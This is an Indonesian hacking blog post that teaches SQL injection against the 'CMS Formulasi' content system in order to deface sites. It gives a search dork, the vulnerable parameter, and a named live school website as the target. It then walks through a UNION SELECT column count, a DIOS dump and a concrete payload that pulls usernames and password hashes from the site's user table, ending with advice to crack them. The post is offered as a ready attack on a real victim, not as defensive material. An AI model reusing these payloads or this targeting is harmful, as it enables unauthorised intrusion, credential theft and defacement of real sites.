Cara deface CMS Formulasi Versi RasyidMF
Ok guys :), welcome back to my blog again :v . btw hari ini gw mau ngasih tutorial buat kalean, tutorial hack website sih :/ . tpi gk apalah :) buat belajar belajar kan :"v
Ok langsung sadja ;)
Tools yang di butuhkan :
1. Mozzila (Versi 47.0.1) *Yang baru gk bisa instal Hackbar
2. Advance Hackbar (Klik disini)
3. Koneksi
4. Dork (contoh : inurl:/kelas-siswa.html, Yg lain di kembangkan)
1. Mozzila (Versi 47.0.1) *Yang baru gk bisa instal Hackbar
2. Advance Hackbar (Klik disini)
3. Koneksi
4. Dork (contoh : inurl:/kelas-siswa.html, Yg lain di kembangkan)
Ok setelah semua udah siap lu install/pasang :) , langsung aj ke tutorialnya ;)
Btw sebelum itu, Letak vuln nya ;) gw kasih tau dulu yak :"v
Vuln : /kelas-siswa.html
Exploit : [POSTDATA]kelas=[sql]
Target Online : http://smkn1-kedawung.sch.id/smea/kelas-siswa.html
Tutorial :
1.kita buka web http://smkn1-kedawung.sch.id/smea/kelas-siswa.html kemudian pada form kelas kita pilih salah satu jenis kelas. perhatikan gambar di bawah
2.kemudian kita aktifkan hackbar yang udah kita pasang tadi dengan menekan tombol f9. kemudian load url dan post data kita centang.*Biasanya udah muncul sendiri pas diinstal
3.terlihat parameter kelas=10 pada post data. kita cek dengan menambahkan tanda kutip (') .. yups.. terjadi error. berarti injeksi dapat kita lanjutkan >> Gk semua website muncul error gitu, meskipun gk muncul, tetep aj lanjutin tutorialny ;), seperti dibawah ini
*Gk muncul error bukan berarti gk vuln :)
4.Kemudian masukan exploit ini [SQL]' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# dan setelah itu klik execute hasil nya akan seperti ini (2018)
Dan muncul angka ajaibny 1,4,6,25 :)
*Ingat, gk semua coloum angka (27), bisa aja yang lain
5.Kemudian, kita block angka 6 yang ada di hackbar, kemudian di Advance Hackbarnya pilih UNION BASED > Dios MYSQL > Dios Madblood dan hasilnya akan seperti ini
>> Setelah execute
*Noh dapat db nya :D, sama coloum rd3grz_users :namausers dan rd3grz_users :sandiusers
6.Yak kita udah dapat Nama DB + Coloumnya, sekarang tinggal kita ganti information_schema.columns,table_name,coloum_name di Post data Hackbar menjadi (contoh : UNION SELECT 1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(rd3grz_users)where@:=export_set(5,export_set(5,@,namausers,0x3c6c693e,2),sandiusers,0xa3a,2)),@,2)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#)
7.Jika sudah di ganti, sekarang tinggal di execute dan hasilnya akan seperti ini
8.Enjoy :) , tinggal crack aj tuh pw ny ;)
Etssss... sebelum, itu hash password lu gk bakal bisa bisa lu crack yaaak ;) , hanya bisa di generator sih :/ , dan jga gw dapat source code CMS Formulasi kalo passwordnya itu seperti ini
Itu sadja sih dari tutorial gw ;)
